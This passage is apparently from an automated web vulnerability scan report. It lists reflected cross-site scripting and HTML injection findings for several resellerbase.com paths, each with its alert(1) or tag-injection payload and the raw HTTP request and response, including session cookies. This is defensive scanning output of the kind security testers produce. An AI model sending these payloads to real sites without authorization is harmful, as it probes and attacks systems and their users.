User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /cpddd67<script>alert(1)</script>90f36a48d0b/ was not found on this server.</p>
...[SNIP]...

2.805. http://www.resellerbase.com/cp/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/cp/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ba70"><a>d79833c08df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ba70\"><a>d79833c08df in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cp/?2ba70"><a>d79833c08df=1 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:23:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Content-Type: text/html
Content-Length: 9248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/cp/?2ba70\"><a>d79833c08df=1" />
...[SNIP]...

2.806. http://www.resellerbase.com/cp/favorite_add.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/cp/favorite_add.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eac65<script>alert(1)</script>4b3b13244b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cpeac65<script>alert(1)</script>4b3b13244b2/favorite_add.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:56:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /cpeac65<script>alert(1)</script>4b3b13244b2/favorite_add.php was not found on this server.</p>
...[SNIP]...

2.807. http://www.resellerbase.com/cp/favorite_add.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/cp/favorite_add.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e6ff"><a>c5fa95c6fc6 was submitted in the REST URL parameter 2. This input was echoed as 2e6ff\"><a>c5fa95c6fc6 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cp/favorite_add.php2e6ff"><a>c5fa95c6fc6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:56:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/cp/favorite_add.php2e6ff\"><a>c5fa95c6fc6" />
...[SNIP]...

2.808. http://www.resellerbase.com/cp/favorite_add.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/cp/favorite_add.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c04c"><a>ff9d2d9cad4 was submitted in the id parameter. This input was echoed as 8c04c\"><a>ff9d2d9cad4 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cp/favorite_add.php?id=178c04c"><a>ff9d2d9cad4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:55:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/cp/favorite_add.php?id=178c04c\"><a>ff9d2d9cad4" />
...[SNIP]...

2.809. http://www.resellerbase.com/cp/favorite_add.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/cp/favorite_add.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a028e"><a>2200e28f086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a028e\"><a>2200e28f086 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cp/favorite_add.php?a028e"><a>2200e28f086=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:55:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/cp/favorite_add.php?a028e\"><a>2200e28f086=1" />
...[SNIP]...

2.810. http://www.resellerbase.com/cp/subscribe.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/cp/subscribe.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f2b3c<script>alert(1)</script>9476e9b4e3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cpf2b3c<script>alert(1)</script>9476e9b4e3c/subscribe.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:56:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /cpf2b3c<script>alert(1)</script>9476e9b4e3c/subscribe.php was not found on this server.</p>
...[SNIP]...

2.811. http://www.resellerbase.com/cp/subscribe.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/cp/subscribe.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1bf0"><a>3a46e233946 was submitted in the REST URL parameter 2. This input was echoed as d1bf0\"><a>3a46e233946 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cp/subscribe.phpd1bf0"><a>3a46e233946 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:56:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/cp/subscribe.phpd1bf0\"><a>3a46e233946" />
...[SNIP]...

2.812. http://www.resellerbase.com/cp/subscribe.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/cp/subscribe.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45613"><a>e98b5451e58 was submitted in the cat parameter. This input was echoed as 45613\"><a>e98b5451e58 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cp/subscribe.php?cat=945613"><a>e98b5451e58 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:55:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/cp/subscribe.php?cat=945613\"><a>e98b5451e58" />
...[SNIP]...

2.813. http://www.resellerbase.com/cp/subscribe.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/cp/subscribe.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5baa"><a>abfadc9a4cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5baa\"><a>abfadc9a4cc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cp/subscribe.php?e5baa"><a>abfadc9a4cc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:55:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/cp/subscribe.php?e5baa\"><a>abfadc9a4cc=1" />
...[SNIP]...

2.814. http://www.resellerbase.com/detail.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 938f2<script>alert(1)</script>48553e45a4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail.php938f2<script>alert(1)</script>48553e45a4a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:13:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail.php938f2<script>alert(1)</script>48553e45a4a was not found on this server.</p>
...[SNIP]...

2.815. http://www.resellerbase.com/detail.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload af386<a>850d0235cee was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail.php?id=555-555-0199@example.comaf386<a>850d0235cee HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail.php?id=555-555-0199@example.comaf386<a>850d0235cee was not found on this server.</p>
...[SNIP]...

2.816. http://www.resellerbase.com/detail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dea3a<a>04e445facb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail.php?id=555-555-0199@example/dea3a<a>04e445facb4.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:13:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail.php?id=555-555-0199@example/dea3a<a>04e445facb4.com was not found on this server.</p>
...[SNIP]...

2.817. http://www.resellerbase.com/detail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a2104<script>alert(1)</script>d49743fbc8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail.php?a2104<script>alert(1)</script>d49743fbc8a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail.php?a2104<script>alert(1)</script>d49743fbc8a=1 was not found on this server.</p>
...[SNIP]...

2.818. http://www.resellerbase.com/detail/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2c7ac<script>alert(1)</script>fbb3a482dea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2c7ac<script>alert(1)</script>fbb3a482dea/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2c7ac<script>alert(1)</script>fbb3a482dea/ was not found on this server.</p>
...[SNIP]...

2.819. http://www.resellerbase.com/detail/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload aa6b6<script>alert(1)</script>ec1a3162bf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/?aa6b6<script>alert(1)</script>ec1a3162bf8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/?aa6b6<script>alert(1)</script>ec1a3162bf8=1 was not found on this server.</p>
...[SNIP]...

2.820. http://www.resellerbase.com/detail/10/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b338<script>alert(1)</script>ccdb94c784d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3b338<script>alert(1)</script>ccdb94c784d/10/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3b338<script>alert(1)</script>ccdb94c784d/10/ was not found on this server.</p>
...[SNIP]...

2.821. http://www.resellerbase.com/detail/10/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce687<script>alert(1)</script>365eaa5ebcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10ce687<script>alert(1)</script>365eaa5ebcc/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10ce687<script>alert(1)</script>365eaa5ebcc/ was not found on this server.</p>
...[SNIP]...

2.822. http://www.resellerbase.com/detail/10/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 94020<script>alert(1)</script>01712bfc583 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/?94020<script>alert(1)</script>01712bfc583=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/?94020<script>alert(1)</script>01712bfc583=1 was not found on this server.</p>
...[SNIP]...

